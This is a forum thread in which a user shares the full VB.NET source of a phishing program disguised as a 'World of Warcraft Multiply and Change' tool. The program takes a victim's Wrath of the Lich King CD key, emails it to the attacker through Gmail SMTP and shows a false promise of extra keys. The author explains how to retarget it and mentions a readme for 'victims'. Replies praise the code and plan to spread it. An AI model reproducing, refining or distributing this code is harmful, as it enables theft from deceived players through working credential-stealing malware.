[Program] Wrath of The Lich King CD-KEY Phisher menu
100% Up to 1000$
4.9/5
150% Up to 200$ & 20 Freespins
4.8/5
Up to 1 BTC
4.9/5
20% Cashback
4.8/5
Up to 5 BTC
4.8/5
100% Up to 1 BTC
4.7/5
Up to 5 BTC
4.7/5
110% Up to 1 BTC
4.6/5

User Tag List

Page 1 of 2 12 LastLast
Results 1 to 15 of 21
  1. #1
    ViND_'s Avatar Contributor
    Reputation
    156
    Join Date
    Apr 2008
    Posts
    1,134
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    [Program] Wrath of The Lich King CD-KEY Phisher

    [Program] Wrath of The Lich King CD-KEY Phisher
    Hello, and welcome. This is my first program. I started it before WotLK came out but never wanted to finish it (it was a blank form). Now I'm in such a need of WotLK keys I decided to finish it (although this is just like making it, it only had a label and a name).


    What this program does is send the information entered in the TextBox to a gmail e-mail, which is going to send it to YOUR e-mail. Right now it's configured to my e-mail but you can change it.

    For that you will need Visual Studio. But first I want to show you the program!



    The Program Itself




    The E-mail you get from your g-mail








    World of Warcraft Mutliply and Change.rar







    USING THE PROGRAM

    To do this you will need Microsoft Visual Studio. After you have that, open my program with it and click the code tab. You will see:

    Code:
    Imports System.Web
    Imports System.IO
    Imports System.Net.Mail
    
    Public Class WH_Team
        Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
            If TextBox1.Text = "" Then
                MsgBox("Please type your World of Warcraft: Wrath of The Lich King key to proceed.", MsgBoxStyle.OkOnly, "WoW GM Hack")
            End If
    
    
    
            Dim mail As New System.Net.Mail.MailMessage()
            Dim SmtpServer As New SmtpClient
            SmtpServer.Credentials = New Net.NetworkCredential("[email protected]", "maskedpw")
            SmtpServer.Port = 587
            SmtpServer.Host = "smtp.gmail.com"
            SmtpServer.EnableSsl = True
            mail.To.Add("[email protected]")
            mail.From = New MailAddress("[email protected]")
            mail.Subject = "Wrath of The Lich King"
            mail.Body = "World of Warcraft: Wrath of the Lich King CD-KEY " & TextBox1.Text
            SmtpServer.Send(mail)
            MsgBox("Thank you for using this program! Your World of Warcraft: Wrath of The Lich King CD-KEY will be multiplied untill there are 10 of them, and it will also create 10 Classic World of Wacraft Keys, as well as 10 World of Warcraft: The Burning Crusade Keys.", MsgBoxStyle.OkOnly, "World of Wacraft Multiply and Change")
    
        End Sub
    End Class
    The orange is the password to the [email protected] (which would be your gmail address). Everyone with Visual Studio can see it. Please don't be pricks and steal anything, because I can just block my mail and you won't be able to enter with the password. Besides, I trust the MMOwned community.

    The things in red in the code must be [email protected]
    Both of them should be the same gmail, remember!

    The one in green is your other e-mail (doesn't have to be gmail). The info will be send to the red e-mail which will re-send it to this green e-mail!






    NOTE: Please say a thank you before you leech it, because I hate giving something to only be seen by leechers who won't even a thanks, thus making the thread sink in the pages which isn't good.


    So, happy new year . It seems I'm a little late, but no matter.






    NOTE: I have a problem which I think you guys can help me with.

    Every time you stretch the window of the program the picture moves, but the labels and textbox stay at one place. And some times the picture doubles itself, but is resized (though it can make it ugly like that).

    Any ideas?

    I had one, but it wasn't for fixing the problem itself.

    I put a readme file for the victims which says what exactly to do, and I meantioned the bugs.




    Ok, that's all from me and I hope you like it. Don't steal it or I'll find ANY profile of yours on any site, and I'm going to ruin your reputation like you would ruin mine.

    Don't forget to comment and say a thanks!





    [Program] Wrath of The Lich King CD-KEY Phisher
  2. #2
    Mango Jerry's Avatar Banned
    Reputation
    192
    Join Date
    Jan 2008
    Posts
    1,244
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    w00t, Jimei!
    You've did it again!

    +Rep for a Great Phisher wich looks very legit.

  3. #3
    ViND_'s Avatar Contributor
    Reputation
    156
    Join Date
    Apr 2008
    Posts
    1,134
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by Hephaestus View Post
    w00t, Jimei!
    You've did it again!

    +Rep for a Great Phisher wich looks very legit.

    Thank you for thanking me unlike evil leechers from my previous threads and for the rep!


    And by all means, if you think there is something wrong with it, tell me now and I will fix it immediately to make it look more legit.

  4. #4
    ViND_'s Avatar Contributor
    Reputation
    156
    Join Date
    Apr 2008
    Posts
    1,134
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    People, stop leeching! 14 views and 2 comments?

    BTW a person PM'ed me and said he had problems with changing the code, so whoever has problems with it, tell me here in the thread and if I can at the moment, I will anwser you and ask for a gmail account and password as well as another e-mail (without password).

  5. #5
    JakezShadow's Avatar Member
    Reputation
    12
    Join Date
    Aug 2008
    Posts
    69
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Nice one, I havnt got wotlk yet so this should help :P
    +rep now or the next time I can
    xbl: bigsneakyninja

  6. #6
    CescFabregas's Avatar Member
    Reputation
    9
    Join Date
    Jan 2009
    Posts
    98
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    any idea where I can get Visual Studio?

    Edit: Forgot to ask: Are these Keys usually usable or would they get your account banned?
    Last edited by CescFabregas; 01-07-2009 at 06:14 PM.

  7. #7
    cps's Avatar Member
    Reputation
    5
    Join Date
    Jun 2007
    Posts
    16
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    opened with VB I can't find a where to edit the code

  8. #8
    poddi's Avatar Member
    Reputation
    1
    Join Date
    Dec 2007
    Posts
    6
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    great program. thank you

  9. #9
    Troys's Avatar Contributor
    Reputation
    122
    Join Date
    Oct 2006
    Posts
    601
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Gonna throw this up on Limewire .. :P
    Pals 4 Life

  10. #10
    Licha's Avatar Member
    Reputation
    7
    Join Date
    May 2007
    Posts
    62
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Nice looking program

  11. #11
    ViND_'s Avatar Contributor
    Reputation
    156
    Join Date
    Apr 2008
    Posts
    1,134
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Thanks everyone!


    @ CescFabregas; What do you mean if the keys work? The program doesn't do what it does REALLY. What it does it send the information typed in the textbox to your e-mail, thus getting you a WotLK key if the victim caught on it like a fish. That's why it's called a phisher. But the program works Oh, and you can get visual studio at torrent sites but NO WAREZ here so I can't tell you. But I can forward you to a person who can get it for you. Toxicity12.



    @cps the problem might have been because of ME, I think I got it now, and I'm not an expert with VB so I might have made this mistake. I just tried and... it can't open exe files. Anyway, I will change it to your liking if you want to (that is untill I figure out the problem, might ask a VB programmer to help me out )



    All I need is for you to create a gmail.com e-mail and give it to me along with the password. Then give me the mail you want to recieve the codes at, but without a password. And that's it. I'll suit it up for you and upload it at mediafire with your name.

    EDIT: It became a link lol
    Last edited by ViND_; 01-08-2009 at 04:37 AM.

  12. #12
    Arenev's Avatar Member
    Reputation
    1
    Join Date
    Dec 2008
    Posts
    10
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    thats cool +rep

  13. #13
    ViND_'s Avatar Contributor
    Reputation
    156
    Join Date
    Apr 2008
    Posts
    1,134
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by Arenev View Post
    thats cool +rep

    You know I hate people that say that they will give you rep and... they give you + 0 rep.

    Those are the real leechers.


    Didn't you know that you can select how much rep you give when clicking +Rep?

  14. #14
    Blazzored's Avatar Member
    Reputation
    2
    Join Date
    Dec 2008
    Posts
    20
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    to solve the problem with the stretching change the max and min size of the form to the current size. That will stop people changing the size.

  15. #15
    Nfinite's Avatar Member
    Reputation
    3
    Join Date
    Jan 2009
    Posts
    10
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    tyvm sir, ill put this to good use

Page 1 of 2 12 LastLast

Similar Threads

  1. [US] Wrath of the Lich King BETA Key $135
    By brendanec in forum Members Only Accounts And CD Keys Buy Sell
    Replies: 2
    Last Post: 09-11-2008, 03:02 PM
  2. WTS Wrath of the lich king beta key
    By KuRIoS in forum Members Only Accounts And CD Keys Buy Sell
    Replies: 31
    Last Post: 08-21-2008, 04:52 PM
  3. Wrath of the lich king beta key
    By Papichris00 in forum World of Warcraft General
    Replies: 6
    Last Post: 08-09-2008, 11:55 PM
All times are GMT -5. The time now is 07:05 AM. Powered by vBulletin® Version 4.2.3
Copyright © 2025 vBulletin Solutions, Inc. All rights reserved. User Alert System provided by Advanced User Tagging (Pro) - vBulletin Mods & Addons Copyright © 2025 DragonByte Technologies Ltd.
Google Authenticator verification provided by Two-Factor Authentication (Free) - vBulletin Mods & Addons Copyright © 2025 DragonByte Technologies Ltd.
Digital Point modules: Sphinx-based search